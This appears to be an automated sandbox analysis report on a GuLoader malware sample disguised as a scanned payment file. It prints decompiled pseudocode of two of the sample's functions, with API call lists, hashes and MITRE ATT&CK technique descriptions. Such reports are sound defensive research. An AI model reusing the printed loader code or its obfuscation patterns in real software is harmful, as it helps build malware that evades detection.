Opcode Fuzzy Hash: 4637df02a9ecdefcb39566079bef3a9458e23bb5b3625cc306c39f0933ddcf8f
Instruction Fuzzy Hash: 954101B1C0020CAADB10EFE5C946BDEBBB8AF44718F60412AF112771E1EB785649CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420A1D, Relevance: 27.2, APIs: 18, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00420A1D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v36;
				char _v48;
				short _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				char _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				void* _v124;
				char _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				short _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				char* _t121;
				signed int _t125;
				char* _t131;
				signed int _t135;
				short _t139;
				char* _t146;
				signed int _t152;
				signed int _t157;
				char* _t159;
				void* _t180;
				void* _t182;
				intOrPtr _t183;

				_t183 = _t182 - 0xc;
				 *[fs:0x0] = _t183;
				L00401350();
				_v16 = _t183;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401356, _t180);
				_push(0x11);
				_push(0x40404c);
				_push( &_v48);
				L004014B8();
				if( *0x422010 != 0) {
					_v172 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v172 = 0x422010;
				}
				_t121 =  &_v68;
				L00401566();
				_v132 = _t121;
				_t125 =  *((intOrPtr*)( *_v132 + 0x1c8))(_v132,  &_v124, _t121,  *((intOrPtr*)( *((intOrPtr*)( *_v172)) + 0x300))( *_v172));
				asm("fclex");
				_v136 = _t125;
				if(_v136 >= 0) {
					_v176 = _v176 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x403c58);
					_push(_v132);
					_push(_v136);
					L00401572();
					_v176 = _t125;
				}
				_push(_v124);
				_push( &_v88);
				L0040140A();
				if( *0x422010 != 0) {
					_v180 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v180 = 0x422010;
				}
				_t131 =  &_v72;
				L00401566();
				_v140 = _t131;
				_t135 =  *((intOrPtr*)( *_v140 + 0x1e0))(_v140,  &_v64, _t131,  *((intOrPtr*)( *((intOrPtr*)( *_v180)) + 0x300))( *_v180));
				asm("fclex");
				_v144 = _t135;
				if(_v144 >= 0) {
					_v184 = _v184 & 0x00000000;
				} else {
					_push(0x1e0);
					_push(0x403c58);
					_push(_v140);
					_push(_v144);
					L00401572();
					_v184 = _t135;
				}
				_v168 = _v64;
				_v64 = _v64 & 0x00000000;
				_v96 = _v168;
				_v104 = 0x8008;
				_push( &_v88);
				_t139 =  &_v104;
				_push(_t139);
				L00401458();
				_v148 = _t139;
				_push( &_v72);
				_push( &_v68);
				_push(2);
				L00401512();
				_push( &_v104);
				_push( &_v88);
				_push(2);
				L0040153C();
				if(_v148 != 0) {
					if( *0x4223fc != 0) {
						_v188 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c38);
						L00401578();
						_v188 = 0x4223fc;
					}
					_v132 =  *_v188;
					_t152 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v68);
					asm("fclex");
					_v136 = _t152;
					if(_v136 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c28);
						_push(_v132);
						_push(_v136);
						L00401572();
						_v192 = _t152;
					}
					_v140 = _v68;
					_t157 =  *((intOrPtr*)( *_v140 + 0xc8))(_v140,  &_v124);
					asm("fclex");
					_v144 = _t157;
					if(_v144 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0xc8);
						_push(0x403c48);
						_push(_v140);
						_push(_v144);
						L00401572();
						_v196 = _t157;
					}
					_v56 = _v124;
					L0040156C();
					_t159 =  &_v48;
					_push(_t159);
					_push(1);
					L00401404();
					_v156 = _t159;
					_v152 = 1;
					_v60 = _v60 & 0x00000000;
					while(_v60 <= _v156) {
						asm("cdq");
						 *((char*)(_v36 + _v60)) = (_v60 + 0xe9) % 0xff;
						_v60 = _v60 + _v152;
					}
				}
				_push(0x420dae);
				_v128 =  &_v48;
				_t146 =  &_v128;
				_push(_t146);
				_push(0);
				L004014D6();
				return _t146;
			}

0x00420a20
0x00420a2f
0x00420a3b
0x00420a43
0x00420a46
0x00420a4d
0x00420a5c
0x00420a5f
0x00420a61
0x00420a69
0x00420a6a
0x00420a76
0x00420a93
0x00420a78
0x00420a78
0x00420a7d
0x00420a82
0x00420a87
0x00420a87
0x00420ab7
0x00420abb
0x00420ac0
0x00420acf
0x00420ad5
0x00420ad7
0x00420ae4
0x00420b06
0x00420ae6
0x00420ae6
0x00420aeb
0x00420af0
0x00420af3
0x00420af9
0x00420afe
0x00420afe
0x00420b11
0x00420b15
0x00420b16
0x00420b22
0x00420b3f
0x00420b24
0x00420b24
0x00420b29
0x00420b2e
0x00420b33
0x00420b33
0x00420b63
0x00420b67
0x00420b6c
0x00420b84
0x00420b8a
0x00420b8c
0x00420b99
0x00420bbe
0x00420b9b
0x00420b9b
0x00420ba0
0x00420ba5
0x00420bab
0x00420bb1
0x00420bb6
0x00420bb6
0x00420bc8
0x00420bce
0x00420bd8
0x00420bdb
0x00420be5
0x00420be6
0x00420be9
0x00420bea
0x00420bef
0x00420bf9
0x00420bfd
0x00420bfe
0x00420c00
0x00420c0b
0x00420c0f
0x00420c10
0x00420c12
0x00420c23
0x00420c30
0x00420c4d
0x00420c32
0x00420c32
0x00420c37
0x00420c3c
0x00420c41
0x00420c41
0x00420c5f
0x00420c6e
0x00420c71
0x00420c73
0x00420c80
0x00420c9f
0x00420c82
0x00420c82
0x00420c84
0x00420c89
0x00420c8c
0x00420c92
0x00420c97
0x00420c97
0x00420ca9
0x00420cc1
0x00420cc7
0x00420cc9
0x00420cd6
0x00420cfb
0x00420cd8
0x00420cd8
0x00420cdd
0x00420ce2
0x00420ce8
0x00420cee
0x00420cf3
0x00420cf3
0x00420d06
0x00420d0d
0x00420d12
0x00420d15
0x00420d16
0x00420d18
0x00420d1d
0x00420d23
0x00420d2d
0x00420d3f
0x00420d52
0x00420d60
0x00420d3c
0x00420d3c
0x00420d3f
0x00420d64
0x00420d9f
0x00420da2
0x00420da5
0x00420da6
0x00420da8
0x00420dad

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00420A3B
__vbaAryConstruct2.MSVBVM60(?,0040404C,00000011,?,?,?,?,00401356), ref: 00420A6A
__vbaNew2.MSVBVM60(0040324C,00422010,?,0040404C,00000011,?,?,?,?,00401356), ref: 00420A82
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420ABB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000001C8), ref: 00420AF9
#698.MSVBVM60(?,?), ref: 00420B16
__vbaNew2.MSVBVM60(0040324C,00422010,?,?), ref: 00420B2E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420B67
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000001E0), ref: 00420BB1
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 00420BEA
__vbaFreeObjList.MSVBVM60(00000002,?,?,00008008,?), ref: 00420C00
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00401356), ref: 00420C12
__vbaNew2.MSVBVM60(00403C38,004223FC,?,?,?,?,?,00401356), ref: 00420C3C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C28,00000014), ref: 00420C92
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C48,000000C8), ref: 00420CEE
__vbaFreeObj.MSVBVM60(00000000,?,00403C48,000000C8), ref: 00420D0D
__vbaUbound.MSVBVM60(00000001,?), ref: 00420D18
__vbaAryDestruct.MSVBVM60(00000000,?,00420DAE,?,?,?,?,?,00401356), ref: 00420DA8

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$List$#698ChkstkConstruct2DestructUbound
String ID:
API String ID: 2830902964-0
Opcode ID: db266064a64e5a26f63801a33c7f4acf29eaafc9ebbe63bdbef1a38df88769aa
Instruction ID: 30bca89215094a0916a8790bdd5ba2c23090edbcb733a6a2bc4d4aca8eed662b
Opcode Fuzzy Hash: db266064a64e5a26f63801a33c7f4acf29eaafc9ebbe63bdbef1a38df88769aa
Instruction Fuzzy Hash: ACA11A71A00228EFDB10DF94DD45F9DBBB5BF08304F5040AAE549B72A1DB785A84DF19

Uniqueness

Uniqueness Score: -1.00%

Function 0041F47C, Relevance: 15.2, APIs: 10, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041F47C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				char _v52;
				char* _t105;
				void* _t167;
				void* _t169;
				void* _t171;
				void* _t173;
				void* _t175;
				void* _t177;
				void* _t179;
				void* _t181;
				void* _t183;
				void* _t185;
				void* _t187;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t195;
				void* _t197;
				void* _t202;
				void* _t204;
				long long* _t205;

				_t205 = _t204 - 0xc;
				 *[fs:0x0] = _t205;
				L00401350();
				_v16 = _t205;
				_v12 = 0x401280;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401356, _t202);
				 *_t205 =  *0x401278;
				L004014A0();
				L004014A6();
				asm("fcomp qword [0x401270]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags >= 0) {
					_push(0x91);
					_push(0x36);
					_push(0x50);
					_push( &_v52);
					L0040149A();
					_push( &_v52);
					L004014DC();
					L00401560();
					L0040157E();
					_push(0);
					_push(0x10);
					_push(1);
					_push(0x11);
					_push( &_v32);
					_push(1);
					_push(0x80);
					L00401494();
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + 0 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x85;
					_t167 = 1;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t167 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xa;
					_t169 = 2;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t169 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x10;
					_t171 = 3;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t171 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x30;
					_t173 = 4;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t173 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x69;
					_t175 = 5;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t175 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x5e;
					_t177 = 6;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t177 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x4f;
					_t179 = 7;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t179 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xfb;
					_t181 = 8;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t181 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xa2;
					_t183 = 9;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t183 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x1d;
					_t185 = 0xa;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t185 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x14;
					_t187 = 0xb;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t187 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xec;
					_t189 = 0xc;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t189 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x58;
					_t191 = 0xd;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t191 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x9f;
					_t193 = 0xe;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t193 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xe2;
					_t195 = 0xf;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t195 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xbd;
					_t197 = 0x10;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t197 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x6e;
				}
				_v36 = 0x7d58f0;
				asm("wait");
				_push(0x41f696);
				L00401554();
				_t105 =  &_v32;
				_push(_t105);
				_push(0);
				L004014D6();
				return _t105;
			}

0x0041f47f
0x0041f48e
0x0041f498
0x0041f4a0
0x0041f4a3
0x0041f4aa
0x0041f4b9
0x0041f4c4
0x0041f4c7
0x0041f4cc
0x0041f4d1
0x0041f4d7
0x0041f4d9
0x0041f4da
0x0041f4e0
0x0041f4e5
0x0041f4e7
0x0041f4ec
0x0041f4ed
0x0041f4f5
0x0041f4f6
0x0041f500
0x0041f508
0x0041f50d
0x0041f50f
0x0041f511
0x0041f513
0x0041f518
0x0041f519
0x0041f51b
0x0041f520
0x0041f536
0x0041f53f
0x0041f549
0x0041f552
0x0041f55c
0x0041f565
0x0041f56f
0x0041f578
0x0041f582
0x0041f58b
0x0041f595
0x0041f59e
0x0041f5a8
0x0041f5b1
0x0041f5bb
0x0041f5c4
0x0041f5ce
0x0041f5d7
0x0041f5e1
0x0041f5ea
0x0041f5f4
0x0041f5fd
0x0041f607
0x0041f610
0x0041f61a
0x0041f623
0x0041f62d
0x0041f636
0x0041f640
0x0041f649
0x0041f653
0x0041f65c
0x0041f666
0x0041f666
0x0041f66a
0x0041f671
0x0041f672
0x0041f685
0x0041f68a
0x0041f68d
0x0041f68e
0x0041f690
0x0041f695

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041F498
#582.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041F4C7
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041F4CC
#539.MSVBVM60(00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F4ED
__vbaStrVarMove.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F4F6
__vbaStrMove.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F500
__vbaFreeVar.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F508
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000010,00000000,00000036,00000036,00000050,00000036,00000091), ref: 0041F520
__vbaFreeStr.MSVBVM60(0041F696), ref: 0041F685
__vbaAryDestruct.MSVBVM60(00000000,?,0041F696), ref: 0041F690

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$#539#582ChkstkDestructRedim
String ID:
API String ID: 1927214042-0
Opcode ID: 500c593fb47b9f42c1f5452d9bbba0ace2bf48b98c889dceacdb58c9d416bffe
Instruction ID: 09bdf5c8532e61dbc56d23c4db07dfb3a7f1c437d87e5376bcf364ba1f6be70e
Opcode Fuzzy Hash: 500c593fb47b9f42c1f5452d9bbba0ace2bf48b98c889dceacdb58c9d416bffe
Instruction Fuzzy Hash: 77811175A101459FDB19DFA8D985F6ABBB0EB09710F06818AFD509F3E2C778E442CB21

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Scanned Payment Copy00024.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: Scanned Payment Copy00024.scr.exe PID: 7052 Parent PID: 5288

General

Chronological Activities

Analysis Process: conhost.exe PID: 7116 Parent PID: 7052

General

Chronological Activities

Disassembly

Function 0041CC84, Relevance: 344.8, APIs: 180, Strings: 16, Instructions: 1804
COMMON

Function 0041EF8D, Relevance: 68.6, APIs: 35, Strings: 4, Instructions: 358
COMMON

Function 00420DCD, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Function 0041EB5C, Relevance: 13.6, APIs: 9, Instructions: 76
COMMON

Function 00420F23, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Function 004015A8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 265
COMMON

Function 004047F9, Relevance: .1, Instructions: 60
COMMONCrypto

Function 0041F6BD, Relevance: 91.4, APIs: 50, Strings: 2, Instructions: 369
COMMON

Function 0041FF7A, Relevance: 87.8, APIs: 41, Strings: 9, Instructions: 340
COMMON

Function 00420577, Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 206
COMMON

Function 0041EC72, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 177
COMMON

Function 0041FC8A, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 174
COMMON

Function 00420878, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 98
COMMON

Function 00420A1D, Relevance: 27.2, APIs: 18, Instructions: 219
COMMON

Function 0041F47C, Relevance: 15.2, APIs: 10, Instructions: 183
COMMON